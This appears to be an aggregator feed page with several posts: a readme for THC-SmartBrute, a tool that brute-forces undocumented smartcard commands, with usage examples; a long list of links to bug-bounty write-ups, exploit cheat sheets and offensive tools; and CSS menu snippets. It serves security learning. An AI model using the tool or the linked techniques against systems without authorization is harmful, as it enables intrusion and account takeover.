Quantcast
Channel: FoulsCode
Viewing all 21247 articles
Browse latest View live

THC-SmartBrute

$
0
0

[0x00] What is THC-SMARTBRUTE ?

This tool finds undocumented and secret commands implemented in a smartcard.
An instruction is divided into Class (CLA), Instruction-Number (INS) and the
parameters or arguments P1, P2, P3. THC-SMARTBRUTE iterates through all the possible
values of CLA and INS to find a valid combination.

Furthermore it tries to find out what parameters are valid for a given class and instruction number.


  [0x01] Requirements

You need a PC/SC compatible smartcard reader that is supported by the PCSC-LITE library.
A list of supported devices can be found here
THC-SMARTBRUTE was developped with the XXX smartcard reader.


  [0x02] Compiling

Install the PCSC-LITE library first (Download)
Edit Makefile to your needs and run make.


  [0x02] Command line arguments

--verbose
        prints a lot of debugging messages to stderr *FIXME*
--undoconly
        only prints found instruction if its not element of the standard
        instruction list
--fastresults
        before iterating through all possible combinates of class and
        instruction-number typical class/instruction-values are verified for
        availability.
        After that the classes 0x00, 0x80 and 0xA0 (GSM) are tried first.
--help
        prints out the usage
--chv1 pin1
        a VERIFY CHV1 instruction with pin1 as argument is executed
--chv2 pin2
        a VERIFY CHV2 instruction with pin2 as argument is executed

--brutep1p2
        finds valid parameter p1 and p2 combinations for the instruction
        the user defined with --cla and --ins .
        For parameter p1 the value 0x00 is assumed.

--brutep3
        find valid p3 values for given --cla, --ins, --p1 and --p2

--cla CLASS
        sets the instruction class to CLASS
--ins INS
        sets the instruction-number to INS
--p1 P1
        sets parameter p1 to P1
--p2 P2
        sets parameter p2 to P2
--p3 P3
        sets parameter p3 to P3


  [0x04] Examples

1. ~$ ./thc-smartbrute
        run thcsmartbrute without any arguments to brute force for valid instructions
2. ~$ ./thc-smartbrute --undoconly
        find valid instructions but only print out non-standard instructions

3. ~$ ./thc-smartbrute --cla 0xA0 --ins 0xA4 --brutep1p2
        find the first two arguments for the GSM instruction SELECT FILE

4. ~$ ./thc-smartbrute --cla 0xA0 --ins 0xA4 --p1 0x00 --p2 0x00 --brutep3
        find the 3rd argument for the already found first two arguments 
        for the GSM instruction SELECT FILE
        

  [0x05] Some interesting smartcard links

1. ISO 7816 - the standard for general purpose smartcards
2. List of supported devices here
3. PCSC-Lite library homepage


  [0x06] Download Link

Grab the latest release thcsmartbrute-1.0.tar.gz



 Yours sincerly,

 Gamma
 The Hackers Choice
 http://www.thc.org/thc-smartbrute


Δίκτυα video - Part 3

$
0
0



Greek Anonymous.wmv

$
0
0

Δίκτυα video - Part 4

$
0
0



Hacking Resources

$
0
0


Disclosures

Application Logic

06/18/2013 - https://labs.spotify.com/2013/06/18/creative-usernames/ - Creative usernames and Spotify account hijacking
06/26/2013 - Hijacking a Facebook Account with SMS - https://whitton.io/articles/hijacking-a-facebook-account-with-sms/
03/25/2014 - Phabricator Bypass auth.email-domains - https://hackerone.com/reports/2233
05/15/2016 - The Bank Job - https://boris.in/blog/2016/the-bank-job/
05/19/2016 - InstaBrute: Two Ways to Brute-force Instagram Account Credentials - https://www.arneswinnen.net/2016/05/instabrute-two-ways-to-brute-force-i...
06/06/2016 - Trello bug bounty: Payments informations are sent to the webhook - https://hethical.io/trello-bug-bounty-payments-informations-are-sent-to-...
06/07/2016 - Pwning Pornhub (memcache) - https://blog.zsec.uk/pwning-pornhub/
07/01/2016 - Magento – Re-Installation & Account Hijacking Vulnerabilities - http://netanelrub.in/2016/07/01/magento-re-installation-account-hijackin...
08/08/2016 - Free way to Facebook Freebooting | Hacking Rights Manager - http://www.7xter.com/2016/08/free-way-to-facebook-freebooting.html
08/16/2016 - Google Chrome, Firefox Address Bar Spoofing Vulnerability - http://www.rafayhackingarticles.net/2016/08/google-chrome-firefox-addres...
08/18/2016 - How I hacked an Android App to Get Free Beer - https://breakdev.org/how-i-hacked-an-android-app-to-get-free-beer/
09/02/2016 - Response To Request Injection (RTRI) - https://www.bugbountyhq.com/front/latestnews/dWRWR0thQ2ZWOFN5cTE1cXQrSFZ...

Authentication

04/27/2016 - Microsoft Office 365 SAML Bypass - http://www.economyofmechanism.com/office365-authbypass.html
04/28/2016 - Slack bot token leakage exposing business critical information - https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-b...
06/01/2016 - Taking over Heroku accounts - http://esevece.github.io/2016/06/01/taking-over-heroku-accounts.html
10/20/2016 - Slack, a Brief Journey to Mission Control - http://secalert.net/slack-security-bug-bounty.html
11/02/2016 - Bypassing Two-Factor Authentication on OWA & Office365 Portals - http://www.blackhillsinfosec.com/?p=5396

CORS/CSP

04/04/2016 - CSP: bypassing form-action with reflected XSS - https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-ref...
12/16/2016 - Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin...

CSRF

05/17/2016 - How I bypassed Facebook CSRF in 2016 - http://pouyadarabi.blogspot.ca/2016/05/how-i-bypassed-facebook-csrf-in-2...
19/07/2016 - Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-pic...
26/10/2016 - Google Spreadsheet Vuln - CSRF and JSON Hijacking allows data theft - https://www.rodneybeede.com/Google_Spreadsheet_Vuln_-_CSRF_and_JSON_Hija...

CSV Injection

29/01/2013 - Cell Injection: Attacking the End User Through the Application - http://blog.7elements.co.uk/2013/01/cell-injection.html
04/17/2016 - CSV Injection in business.uber.com - http://blog.daviddworken.com/posts/csv-injection-in-businessubercom/

HPP

08/23/2015 - Twitter HPP vulnerability unsubscribing from emails - http://www.merttasci.com/blog/twitter-hpp-vulnerability/
12/03/2015 - Parameter Tampering Attack on Twitter Web Intents - https://ericrafaloff.com/parameter-tampering-attack-on-twitter-web-intents/
02/02/2016 - Bypassing Digits web authentication's host validation with HPP - https://hackerone.com/reports/114169

Host Header Injection
09/06/2016 - Internet Explorer has a URL Problem - http://blog.innerht.ml/internet-explorer-has-a-url-problem/
10/24/2016 - Combining Host Header Injection and Lax Host Parsing Service Malicious Data - https://labs.detectify.com/2016/10/24/combining-host-header-injection-an...

IDOR

06/23/2016 - UBER HACKING: HOW WE FOUND OUT WHO YOU ARE, WHERE YOU ARE AND WHERE YOU WENT! - https://labs.integrity.pt/articles/uber-hacking-how-we-found-out-who-you...
06/23/2016 - Facebook's Bug - Delete any video from Facebook - http://www.pranavhivarekar.in/2016/06/23/facebooks-bug-delete-any-video-...
08/25/2016 - How I Could Have Hacked Multiple Facebook Accounts - https://medium.com/@gurkiratsingh/how-i-could-have-hacked-multiple-faceb...
11/22/2016 - You get a UUID! You get a UUID! Everybody gets a UUID! - http://www.rohk.xyz/uber-uuid/

Information Disclosure

12/21/2016 - Disclosing the primary email address for each Facebook user - http://www.dawgyg.com/2016/12/21/disclosing-the-primary-email-address-fo...

SSRF

04/18/2016 - ESEA Server-Side Request Forgery and Querying AWS Meta Data - http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-queryin...
02/23/2016 - FFMPEG File Disclosure - https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-2015/web/sup...
Trello Bug BOunty Access Servier Files Using Imagetragick - https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetr...

SSTI

04/25/2016 - Adapting AngularJS Payloads to Exploit Real World Applications - http://blog.portswigger.net/2016/04/adapting-angularjs-payloads-to-explo...

Reverse Engineering

04/19/2016 - Digging into a Facebook Worm -https://gist.githubusercontent.com/phwd/0ec21c6289543f35135e17aa11f7dec1...
07/01/2016 - How I Cracked a Keylogger and Ended Up in Someone's Inbox - https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keyl...
11/14/2016 - Hacking Team Back For Your Androids - http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/

Relative Path Overwrite

03/21/2014 - Relative vs Absolute - http://www.thespanner.co.uk/2014/03/21/rpo/
02/17/2015 - Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities - http://blog.portswigger.net/2015/02/prssi.html
07/03/2016 - RPO Gadgets - http://blog.innerht.ml/rpo-gadgets/

XSS

07/06/2010 - Facebook XSS via Cross-Origin Resource Sharinghttp://maustin.net/2010/07/06/facebook_html5.html
02/14/2013 - How I got the Bug Bounty for Mega.co.nz XSS - https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-...
04/22/2015 - XSS via Host header - www.google.com/cse - http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
12/08/2015 - Creative bug which result Stored XSS on m.youtube.com - http://sasi2103.blogspot.ca/2015/12/creative-bug-which-result-stored-xss...
04/17/2016 - XSS in pypi (and Uber!) - http://blog.daviddworken.com/posts/xss-in-pypi-and-uber/
04/17/2016 - XSS in getrush.uber.com - http://blog.daviddworken.com/posts/xss-in-getrushubercom/
04/19/2016 - Using a Braun Shaver to Bypass XSS Audit and WAF - https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-...
05/09/2016 - XSS and RCE, domain takeover with remote loaded JS - http://brutelogic.com.br/blog/xss-and-rce/
06/13/2016 - Embedding XSS in SVG files - http://bini.tech/wordpress-remote-upload-unrestricted-file-upload/
07/02/2016 - OneDrive: an easter egg into MS library - XSS on Microsoft and not only - https://luc10.github.io/onedrive-an-easter-egg-into-ms-library/
07/04/2016 - Apple and the 5 XSSes - http://strukt93.blogspot.ca/2016/07/apple-and-5-xsses.html
07/19/2016 - Instagram Reflected XSS in Link Shim - http://ameeras.me/Instagram-Reflected-XSS-in-Link-Shim/
07/19/2016 - Blind XSS in Spotify - https://mhmdiaa.github.io/jekyll/update/2016/07/19/blind-xss-in-spotify....
07/22/2016 - United to XSS United - http://strukt93.blogspot.ca/2016/07/united-to-xss-united.html
08/29/2016 - Turning Self-XSS into Good XSS v2: Challenge Completed but Not Rewarded - https://httpsonly.blogspot.ca/2016/08/turning-self-xss-into-good-xss-v2....
08/31/2016 - Breaching a CA – Blind Cross-site Scripting (BXSS) in the GeoTrust SSL Operations Panel Using XSS Hunter - https://thehackerblog.com/breaching-a-ca-blind-cross-site-scripting-bxss...
09/19/2016 - Combination of techniques lead to DOM Based XSS in Google - http://sasi2103.blogspot.ca/2016/09/combination-of-techniques-lead-to-do...
12/07/2016 - Stored XSS Affecting All Fantasy Sports on Yahoo - http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fan...

XXE

06/25/2014 - Identifying Xml eXternal Entity vulnerability (XXE) in GPX files - http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
03/21/2015 - XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250] - https://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library...
08/14/2015 - XXE ALL THE THINGS!!! (INCLUDING APPLE IOS’S OFFICE VIEWER) - https://labs.integrity.pt/articles/xxe-all-the-things-including-apple-io...

CRLF

03/15/2015 - Parse.com - X-Forwarded-Host Injection - Bypass secure & HTTP_only Vulnerability - https://www.youtube.com/watch?v=1yUw7rtTTeI

Remote Code Execution

12/09/2013 - Remote Code Execution exploit in WordPress 3.5.1 - https://tom.vg/2013/12/wordpress-rce-exploit/
02/15/2015 - RCE in Oracle NetBeans Opensource Plugins: PrimeFaces 5.x Expression Language Injection - http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource...
11/06/2015 - Java unserialization - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss...
11/12/2015 - XSS to Remote Code Execution with HipChat - http://maustin.net/2015/11/12/hipchat_rce.html
05/04/2016 - Remote Code Execution via ImageMagick - http://pastebin.com/aE4sKnCg (file)
05/10/2016 - Exploiting ImageMagick on Polyvore (Yahoo) - http://nahamsec.com/exploiting-imagemagick-on-yahoo/
07/22/2016 - Exploiting Java Deserialization via JBoss - https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserializati...
07/25/2016 - CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability - http://www.korpritzombie.com/cve-2016-5840-trend-micro-deep-discovery-ho...
08/15/2016 - Jetbrains IDE Remote Code Execution and Local File Disclosure - http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-e...
08/24/2016 - The Million Dollar Dissident - https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-...
09/21/2016 - pwn them for learn -http://bugdisclose.blogspot.ca/2016/09/pwn-them-for-learn.html
10/26/2016 - Details on the Privilege Escalation Vulnerability in Joomla - https://blog.sucuri.net/2016/10/details-on-the-privilege-escalation-vuln...

Memory Related

5/13/2016 - 7-Zip vulnerabilities found by Talos - http://blog.talosintel.com/2016/05/multiple-7-zip-vulnerabilities.html

Source Code Disclosure

03/27/2016 - A tale of an interesting source code leak - http://secalert.net/#scl-soh
07/19/2016 - Accessing PornHub's SVN repo - https://hackerone.com/reports/72243
07/22/2016 - Twitter's Vine Source code dump - https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/
10/14/2016 - Importance of up-to-date application usage plus complex password OR from directory traversal to admin panel takeover - http://zuh4n.blogspot.ca/

SQLi

12/20/2016 - Flickr from SQLi to RCE - https://pwnrules.com/flickr-from-sql-injection-to-rce/
07/25/2016 - SQL Injection on sctrack.email.uber.com.cn - https://hackerone.com/reports/150156

Subdomain Takeover

10/21/14 - Hostile Subdomain Takeover using Heroku/Github/Desk + more - https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-h...
12/08/14 - Hijacking of abandoned subdomains part 2 - https://labs.detectify.com/2014/12/08/hijacking-of-abandoned-subdomains-...
07/26/16 - Uber Subdomain Takeover - http://blog.eseccyber.tech/article/uber.html
09/05/2016 - How I was able to read Uber logs and internal emails - http://blog.pentestnepal.tech/post/149985438982/how-i-was-able-to-read-u...

HTML Injection

07/26/2016 - Keeping Positive – Obtaining Arbitrary Wildcard SSL Certificates from Comodo via Dangling Markup Injection - https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-...

OAuth

02/07/2014 - How I Hacked GitHub Again. - http://homakov.blogspot.ca/2014/02/how-i-hacked-github-again.html
07/20/2015 - Bypassing Google Authentication on Periscope's Administration Panel - https://whitton.io/articles/bypassing-google-authentication-on-periscope...
01/04/2016 - Bypassing callback_url validation on Digits - https://hackerone.com/reports/108113
02/29/2016 - Swiping Facebook Official Access Tokens - http://philippeharewood.com/swiping-facebook-official-access-tokens/
04/03/2016 - Obtaining Login Tokens for Outlook, Office or Azure (OAuth) - https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/
06/16/2016 - Bypass Disabled Client OAuth Login in Facebook Pages Manager App - http://philippeharewood.com/bypass-disabled-client-oauth-login-in-facebo...
10/13/2016 - CVE-2016-4977: RCE in Spring Security OAuth - http://secalert.net/#CVE-2016-4977

Mobile

04/12/2015 - Shopify android client all API request's response leakage - https://hackerone.com/reports/56002
07/26/2016 - Odnoklassniki Android application vulnerabilities - https://hackerone.com/reports/97295

Browser
12/06/16 - Firefox - SVG cross domain cookie vulnerability - https://insert-script.blogspot.ca/2016/12/firefox-svg-cross-domain-cooki...


CTF Writeups

03/03/2013 - Unauthorized Access: Bypassing PHP strcmp() - http://danuxx.blogspot.ca/2013/03/unauthorized-access-bypassing-php-strc...
06/09/2016 - Hack in the Box 2016 – MISC400 Writeup (Part 1) - http://rileykidd.com/2016/06/09/hack-in-the-box-2016-misc400-writeup-par...
10/03/2016 - Hacking the Hard Way at the Derbycon CTF - https://labs.signalsciences.com/hacking-the-hard-way-at-the-derbycon-ctf...
BSides Ottawa CTF - Second Place! - https://blog.fletchto99.com/2016/october/bsides-ottawa/
2016 Hack the Vote - https://github.com/ctfs/write-ups-2016/tree/master/hack-the-vote-ctf-2016
Resources

XXE Payloads in iOS - http://en.hackdig.com/08/28075.htm
Burp Tutorials - https://vimeo.com/album/3510171
Facebook CTF - https://github.com/facebook/fbctf
SSRF Bible - https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa...
Jerry Gamblin Hacking Blog - http://jerrygamblin.com/category/hacking
Filedescriptor XSS Polygots - http://polyglot.innerht.ml/
prompt.ml XSS Challenge - https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#hidden-level--1
Hacking with Unicode - https://speakerdeck.com/mathiasbynens/hacking-with-unicode-in-2016
Programming Practice (paid premium) - https://coderbyte.com/
Online CTF Practice challenges - https://backdoor.sdslabs.co
Nicolas Grégoire Burp Pro Tips - http://www.agarri.fr/docs/HiP2k13-Burp_Pro_Tips_and_Tricks.pdf
Open Security Training - http://opensecuritytraining.info/
OWASP Mutillidae II Web Pen-Test Practice Application - https://sourceforge.net/projects/mutillidae/
DNS - https://haxpo.nl/haxpo2015ams/wp-content/uploads/sites/4/2015/04/D1-P.-M...
XSS without HTML: Client-Side Template Injection with AngularJS - http://blog.portswigger.net/2016/01/xss-without-html-client-side-templat...
File Upload XSS - http://brutelogic.com.br/blog/file-upload-xss/
CSV Injection Mitigations - https://blog.zsec.uk/csv-dangers-mitigations/
Comma Separated Vulnerabilities - http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
Running your own anonymous rotating proxies - http://blog.databigbang.com/running-your-own-anonymous-rotating-proxies/
Reviewing bug bounties - a hacker's perspective - http://www.skeletonscribe.net/2016/08/reviewing-bug-bounties-hackers.html
Practical HTTP Host Header Attacks - http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks...
Practice CTF List / Permanant CTF List - https://captf.com/practice-ctf/
lcamtuf's blog - https://lcamtuf.blogspot.ca/
Backup File Artifacts - http://blog.mazinahmed.net/2016/08/backup-file-artifacts.html
Unicode Character 'PILE OF POO' - http://www.fileformat.info/info/unicode/char/1F4A9/index.htm
Decompile and Recompile Android APK - https://blog.bramp.net/post/2015/08/01/decompile-and-recompile-android-apk/
Frans Rosen - Time Based Captcha Protected SQLi - http://www.slideshare.net/fransrosen/time-based-captcha-protected-sql-in...
CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy - https://research.google.com/pubs/pub45542.html
How to View TLS Traffic in Android’s Logs - https://blog.securityevaluators.com/how-to-view-tls-traffic-in-androids-...
https://url.spec.whatwg.org/
AngularJS Sandbox Escapes Explained - https://www.reddit.com/r/angularjs/comments/557bhr/xss_in_angularjs_vide...
Senate Republicans were skimmed for six months, quietly fix store - https://gwillem.github.io/2016/10/04/how-republicans-send-your-credit-ca...
Introduction to OSINT: Recon-ng Tutorial - https://strikersecurity.com/blog/getting-started-recon-ng-tutorial/
Exploiting CORS misconfigurations - http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-fo...
Abusing Dorking and Robots.txt - http://sten0.ghost.io/2016/10/13/abusing-dorking-and-robots-txt/
Brute Logic XSS Challenge I - http://brutelogic.com.br/blog/xss-challenge-i/
How Google and Bing Protect their APIs - https://rudk.ws/2016/10/23/how-google-and-bing-protects-their-api/
Free Dev Books - https://devfreebooks.github.io/
IOS Application Security Review Methodology - http://research.aurainfosec.io/ios-application-security-review-methodology/
Anatomy of a Subtle JSON Vulnerability - http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerabi...
Finding XSS Slidedeck - http://slides.com/mscasharjaved/deck-13#/
XSS Polyglots - https://blog.bugcrowd.com/xss-polyglots-the-context-contest?utm_campaign...
Bypassing Saml 2.0 SSO - http://research.aurainfosec.io/bypassing-saml20-SSO/
Bypassing CSP using polyglot jpegs - http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html
Facebook Graphql Crash Course - https://www.facebook.com/notes/phwd/a-facebook-graphql-crash-course/1189...
New XXSI Vector Untold Merits of nosniff - https://www.hurricanelabs.com/blog/new-xssi-vector-untold-merits-of-nosniff
Research papers

Minded Security Expression Language Injection Paper - https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf
Sandboxing JavaScript in the Browser - https://var.thejh.net/thesis_excerpt.pdf
Does The Online Card Payment Landscape Unwittingly Facilitate Fraud? - http://eprint.ncl.ac.uk/file_store/production/230123/19180242-D02E-47AC-...
Online Courses / Training

Cyber Security Base with F-Secure is a free course series by University of Helsinki - https://cybersecuritybase.github.io/
Vulnerable Web Applications for Learning - https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applica...
Jame Kettle's hackxor - http://hackxor.sourceforge.net/cgi-bin/index.pl#demo
Google XSS Game - https://xss-game.appspot.com/
Google DOM Based XSS - https://public-firing-range.appspot.com/address/index.html
Code Lab: Web Application Exploits and Defenses - https://google-gruyere.appspot.com/
Cheat Sheets

Path Traversal Cheat Sheet Linux - https://www.gracefulsecurity.com/path-traversal-cheat-sheet-linux/
XXE - https://www.gracefulsecurity.com/xxe-cheatsheet/
HTML5 Security Cheat Sheet - https://html5sec.org/
Brute XSS Cheat Sheet - http://brutelogic.com.br/blog/cheat-sheet/
MySQL SQL Injection Cheat Sheet - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-c...
AngularJS Sandbox Bypass Collection (includes 1.5.7) - http://pastebin.com/xMXwsm0N
Java Deserialization - https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
Penetration testing tools cheat sheet - https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
OAuth - https://github.com/homakov/oauthsecurity
Burp How Tos

http://security-geek.in/2014/08/22/using-burp-suite-to-brute-force-http-...
Tools

Discovery
https://github.com/OJ/gobuster
Sublist3r is python tool that is designed to enumerate subdomains of websites using search engines - https://github.com/aboul3la/Sublist3r
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible - https://github.com/ChrisTruncer/EyeWitness
Smart content discovery burp plugin with context awareness - https://github.com/pathetiq/BurpSmartBuster
An automated tool that checks for backup artifacts that may discloses the web-application's source code - https://github.com/mazen160/bfac

Recon-ng
Recon-ng + Google Dorks + Burp = ... - https://averagesecurityguy.github.io/2016/10/21/recon-ng-dorks-burp/

Port Scanning
Resolve and quickly portscan a list of (sub)domains - https://github.com/melvinsh/subresolve

Mobile
JD-GUI, a standalone graphical utility that displays Java sources from CLASS files. - https://github.com/java-decompiler/jd-gui
Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static, dynamic analysis and web API testing - https://github.com/ajinabraham/Mobile-Security-Framework-MobSF
An xposed module that disables SSL certificate checking for the purposes of auditing an app with cert pinning - https://github.com/Fuzion24/JustTrustMe
Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps - https://github.com/nabla-c0d3/ssl-kill-switch2
Android APK Tool - https://ibotpeaches.github.io/Apktool/
Android Dex2Jar - https://github.com/pxb1988/dex2jar

Decompiler
JPEXS Free Flash Decompiler - https://github.com/jindrapetrik/jpexs-decompiler
Flashbang, find theflashVars of a naked SWF and display them - https://github.com/cure53/Flashbang

Java Deserialization
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization - https://github.com/frohoff/ysoserial

Password Cracking
John the Ripper - http://www.openwall.com/john/

Hash Cracking
Online Hash Crack - http://www.onlinehashcrack.com/
CyberChef - https://gchq.github.io/CyberChef/

Vulnerability SaaS
SSRF Detector - https://ssrfdetector.com/
XSSHunter - https://xsshunter.com



via: www.torontowebsitedeveloper.com

Animated popup menu

$
0
0


Χρονια πολλά καλή χρονια να έχουμε όλοι μας και όλος ο κόσμος!

Ένα καταπληκτικό menu γραμμένο με html και css.
Σας ντίνο τον παρακάτω κώδικα η αλλαγές είναι δικέ σας, υπάρχει live demo στο τέλος του θέματος!

<style>
  /* www.foulscode.com */
  * { padding: 0px; margin: 0px; border: 0px; outline: 0px; }

body {
    font-family:Tahoma, sans-serif;
    font-size: 12px;
}

a { text-decoration: none; }
a:hover { text-decoration: underline; }

li { list-style: none; }

.container { margin: 0px 20% 0px 20%; }

#head { margin-top: 20px; }

#menu .box {
    position: fixed;
    text-align: center;
    overflow: hidden;
    z-index: -1;
    opacity: 0;
    width: 100%;
    height: 100%;
    left: 0px;
    top: 0px;
    background: rgba(0,0,0,0.8);
    -webkit-transition: all 0.3s ease-in-out;
    -moz-transition: all 0.3s ease-in-out;
    -o-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
}

#menu ul {
    position: relative;
    top: 20%;
    -webkit-transform: scale(2);
    -moz-transform: scale(2);
    -ms-transform: scale(2);
    transform: scale(2);
    -webkit-transition: all 0.3s ease-in-out;
    -moz-transition: all 0.3s ease-in-out;
    -o-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
}

#menu li {
    display: inline-block;
    margin: 20px;
}

#menu li a {
    border-radius: 3px;
    padding: 15px;
    border: 1px solid transparent;
    text-decoration: none;
    font-size: 18px;
    color: #fff;
    -webkit-transition: all 0.2s ease-in-out;
    -moz-transition: all 0.2s ease-in-out;
    -o-transition: all 0.2s ease-in-out;
    transition: all 0.2s ease-in-out;
}
 /* www.foulscode.com */
#menu li a:hover { border-color: #fff; }

#menu li a i {
    margin-right: 5px;
    font-size: 24px;
}

#toggle-nav-label {
    color: #fff;
    background: rgba(0,0,0,0.2);
    text-align: center;
    line-height: 30px;
    font-size: 16px;
    display: block;
    cursor: pointer;
    position: relative;
    z-index: 500;
    width: 100px;
    height: 30px;
    border-radius: 5px;
}

#toggle-nav { display: none; }

#toggle-nav:checked ~ .box {
    opacity: 1;
    z-index: 400;
}

#toggle-nav:checked ~ .box ul {
    -webkit-transform: scale(1);
    -moz-transform: scale(1);
    -ms-transform: scale(1);
    transform: scale(1);
}

#toggle-nav:checked ~ #toggle-nav-label {
    background: #fff;
    color: rgba(0,0,0,0.8);
}

#content { margin: 20px 0px 20px 0px; }

#content h1 {
    margin-bottom: 20px;
    font-size: 30px;
}

#content p {
    font-size: 14px;
    /* www.foulscode.com */
</style>
<header id="head">
  <div class="container">
  <nav id="menu">
             
    <input type="checkbox" id="toggle-nav"/>
    <label id="toggle-nav-label" for="toggle-nav">
    <i class="icon-reorder">Меню</i></label>
             
    <div class="box">
    <ul>
    <li><a href="URL"><i class="icon-home"></i>
TEXT</a></li>
    <li><a href="
URL"><i class="icon-file-alt"></i>TEXT</a></li>
    <li><a href="URL"><i class="icon-copy"></i>TEXT</a></li>
    <li><a href="URL"><i class="icon-envelope"></i>TEXT</a></li>
    </ul>
    </div>          
  </nav>
  </div>
</header>

<!-- start content -->
    <section id="content">
        <div class="container">
           
<!-- end content -->

LIVE DEMO

Show/Hide Menu with CSS

$
0
0





<style>
  /* wwwfoulscode.com */
  @import url(//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css);
}
@import url(http://fonts.googleapis.com/css?family=Titillium+Web:300);
.fa-2x {
font-size: 2em;
}
.fa {
position: relative;
display: table-cell;
width: 60px;
height: 36px;
text-align: center;
vertical-align: middle;
font-size:20px;
}

.main-menu:hover,nav.main-menu.expanded {
width:250px;
overflow:visible;
}
.main-menu {
background:#fbfbfb;
border-right:1px solid #e5e5e5;
position:absolute;
top:0;
bottom:0;
height:100%;
left:0;
width:60px;
overflow:hidden;
-webkit-transition:width .05s linear;
transition:width .05s linear;
-webkit-transform:translateZ(0) scale(1,1);
z-index:1000;
}
.main-menu>ul {
margin:7px 0;
}
.main-menu li {
position:relative;
display:block;
width:250px;
}
.main-menu li>a {
position:relative;
display:table;
border-collapse:collapse;
border-spacing:0;
color:#999;
 font-family: arial;
font-size: 14px;
text-decoration:none;
-webkit-transform:translateZ(0) scale(1,1);
-webkit-transition:all .1s linear;
transition:all .1s linear;

}
.main-menu .nav-icon {
position:relative;
display:table-cell;
width:60px;
height:36px;
text-align:center;
vertical-align:middle;
font-size:18px;
}
.main-menu .nav-text {
position:relative;
display:table-cell;
vertical-align:middle;
width:190px;
  font-family: 'Titillium Web', sans-serif;
}
.main-menu>ul.logout {
position:absolute;
left:0;
bottom:0;
}
.no-touch .scrollable.hover {
overflow-y:hidden;
}
.no-touch .scrollable.hover:hover {
overflow-y:auto;
overflow:visible;
}
a:hover,a:focus {
text-decoration:none;
}
nav {
-webkit-user-select:none;
-moz-user-select:none;
-ms-user-select:none;
-o-user-select:none;
user-select:none;
}
nav ul,nav li {
outline:0;
margin:0;
padding:0;
}
.main-menu li:hover>a,nav.main-menu li.active>a,.dropdown-menu>li>a:hover,.dropdown-menu>li>a:focus,.dropdown-menu>.active>a,.dropdown-menu>.active>a:hover,.dropdown-menu>.active>a:focus,.no-touch .dashboard-page nav.dashboard-menu ul li:hover a,.dashboard-page nav.dashboard-menu ul li.active a {
color:#fff;
background-color:#5fa2db;
}
.area {
float: left;
background: #e2e2e2;
width: 100%;
height: 100%;
}
@font-face {
  font-family: 'Titillium Web';
  font-style: normal;
  font-weight: 300;
  src: local('Titillium WebLight'), local('TitilliumWeb-Light'), url(http://themes.googleusercontent.com/static/fonts/titilliumweb/v2/anMUvcNT0H1YN4FII8wpr24bNCNEoFTpS2BTjF6FB5E.woff) format('woff');
}
  /* wwwfoulscode.com */
</style
  <html>
  <head>

  </head>
  <body><div class="area"></div><nav class="main-menu">
            <ul>
                <li>
                    <a href="#">
                        <i class="fa fa-home fa-2x"></i>
                        <span class="nav-text">
                            Dashboard
                        </span>
                    </a>
                 
                </li>
                <li class="has-subnav">
                    <a href="#">
                        <i class="fa fa-laptop fa-2x"></i>
                        <span class="nav-text">
                            UI Components
                        </span>
                    </a>
                   
                </li>
                <li class="has-subnav">
                    <a href="#">
                       <i class="fa fa-list fa-2x"></i>
                        <span class="nav-text">
                            Forms
                        </span>
                    </a>
                   
                </li>
                <li class="has-subnav">
                    <a href="#">
                       <i class="fa fa-folder-open fa-2x"></i>
                        <span class="nav-text">
                            Pages
                        </span>
                    </a>
                 
                </li>
                <li>
                    <a href="#">
                        <i class="fa fa-bar-chart-o fa-2x"></i>
                        <span class="nav-text">
                            Graphs and Statistics
                        </span>
                    </a>
                </li>
                <li>
